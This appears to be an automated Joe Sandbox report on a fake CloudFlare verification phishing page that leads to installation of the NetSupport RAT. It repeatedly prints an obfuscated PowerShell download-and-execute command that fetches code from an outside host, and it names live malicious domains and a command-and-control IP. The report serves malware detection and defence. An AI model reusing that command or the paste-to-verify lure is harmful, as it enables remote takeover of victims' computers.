Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://inspyrehomedesign.com/Ray-verify.html

Overview

General Information

Sample URL:https://inspyrehomedesign.com/Ray-verify.html
Analysis ID:1544089
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Contains functionalty to change the wallpaper
Delayed program exit found
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 3008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • mshta.exe (PID: 7848 cmdline: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 8128 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 8152 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 8176 cmdline: attrib +h C:\Users\user\AppData\Roaming\bpsFyf MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • client32.exe (PID: 7368 cmdline: "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
  • rundll32.exe (PID: 7448 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\bpsFyf\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 7 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      21.2.client32.exe.73d70000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        21.0.client32.exe.d10000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          21.2.client32.exe.73d50000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            21.2.client32.exe.111b79e0.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              21.2.client32.exe.111b79e0.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 3 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_7944.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Suspicious MSHTA Child Process
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7944, ProcessName: powershell.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
                                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetFilename: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7944, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Sigma detected: Powershell drops NetSupport RAT client
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetFilename: C:\Users\user\AppData\Roaming\bpsFyf\NSM.LIC

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-28T19:46:17.038167+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:17.218232+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:18.039720+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:19.280274+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:19.443100+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:19.676594+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:19.838942+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:20.094216+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:20.317348+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:25.238092+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:25.701188+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  2024-10-28T19:46:26.502458+010028032742Potentially Bad Traffic192.168.2.1649726166.1.160.21180TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-28T19:45:13.415753+010028277451Malware Command and Control Activity Detected192.168.2.164972992.255.85.135443TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,21_2_110AD570

                                  Phishing

                                  barindex
                                  AI detected phishing page
                                  Source: https://inspyrehomedesign.com/LLM: Score: 9 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare., The URL does not contain any elements that suggest a direct association with CloudFlare., The input fields and instructions provided are unusual for a legitimate CloudFlare service, indicating potential phishing tactics., The domain name 'inspyrehomedesign.com' does not suggest any connection to CloudFlare, raising suspicion. DOM: 2.3.pages.csv
                                  Source: https://inspyrehomedesign.com/LLM: Score: 9 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare., The URL does not contain any elements that suggest a direct association with CloudFlare., The URL appears to be unrelated to the CloudFlare brand, suggesting a potential phishing attempt., The input fields labeled as 'unknown' do not provide any context or association with CloudFlare services. DOM: 2.2.pages.csv
                                  Source: https://inspyrehomedesign.com/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....
                                  Source: https://inspyrehomedesign.com/Ray-verify.htmlHTTP Parser: Found new string: script /*............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*/var ppconf=0;var qy7='';qy8=String.fromCharCode(13,10,13,10);for...
                                  Source: https://inspyrehomedesign.com/Ray-verify.htmlHTTP Parser: No favicon
                                  Source: https://inspyrehomedesign.com/Ray-verify.htmlHTTP Parser: No favicon
                                  Source: https://inspyrehomedesign.com/HTTP Parser: No favicon
                                  Source: https://inspyrehomedesign.com/HTTP Parser: No favicon
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeFile opened: C:\Users\user\AppData\Roaming\bpsFyf\MSVCR100.dllJump to behavior
                                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49714 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49723 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49724 version: TLS 1.2
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2429888490.0000000073D72000.00000002.00000001.01000000.00000010.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000015.00000002.2427957833.0000000073C41000.00000020.00000001.01000000.00000012.sdmp, msvcr100.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.2429698530.0000000073D55000.00000002.00000001.01000000.00000011.sdmp, pcicapi.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.12.dr
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,21_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,21_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,21_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,21_2_111266E0

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49729 -> 92.255.85.135:443
                                  Downloads files with wrong headers with respect to MIME Content-Type
                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:19 GMT Content-Type: image/png Content-Length: 18808 Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT Connection: keep-alive ETag: "6716045c-4978" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 73 76 0a bb 37 17 64 e8 37 17 64 e8 37 17 64 e8 2c 8a f8 e8 35 17 64 e8 2c 8a ce e8 34 17 64 e8 3e 6f f7 e8 30 17 64 e8 37 17 65 e8 0f 17 64 e8 2c 8a ca e8 33 17 64 e8 2c 8a ff e8 36 17 64 e8 2c 8a fe e8 36 17 64 e8 2c 8a f9 e8 36 17 64 e8 52 69 63 68 37 17 64 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 88 bb 55 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 06 00 00 00 16 00 00 00 00 00 00 a0 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 00 00 00 04 00 00 b8 de 00 00 02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 22 00 00 61 00 00 00 b8 20 00 00 50 00 00 00 00 40 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 20 00 00 78 29 00 00 00 50 00 00 84 00 00 00 40 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 04 00 00 00 10 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1b 03 00 00 00 20 00 00 00 04 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 04 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 0d 00 00 00 40 00 00 00 0e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 01 00 00 00 50 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 77280 Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT Connection: keep-alive ETag: "6716045e-12de0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 cb 8f 56 23 aa e1 05 23 aa e1 05 23 aa e1 05 4c dc 7f 05 32 aa e1 05 2a d2 72 05 26 aa e1 05 23 aa e0 05 74 aa e1 05 4c dc 4b 05 75 aa e1 05 4c dc 4a 05 3e aa e1 05 4c dc 7b 05 22 aa e1 05 4c dc 7c 05 22 aa e1 05 52 69 63 68 23 aa e1 05 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 17 6f 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 82 00 00 00 4a 00 00 00 00 00 00 b4 21 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 01 00 00 04 00 00 51 1b 02 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 bd 00 00 3c 00 00 00 00 00 01 00 38 06 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 e0 5d 00 00 00 10 01 00 88 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ba 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de 80 00 00 00 10 00 00 00 82 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 25 00 00 00 a0 00 00 00 26 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2d 00 00 00 d0 00 00 00 0e 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 06 00 00 00 00 01 00 00 08 00 00 00 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 0c 00 00 00 10 01 00 00 0e 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
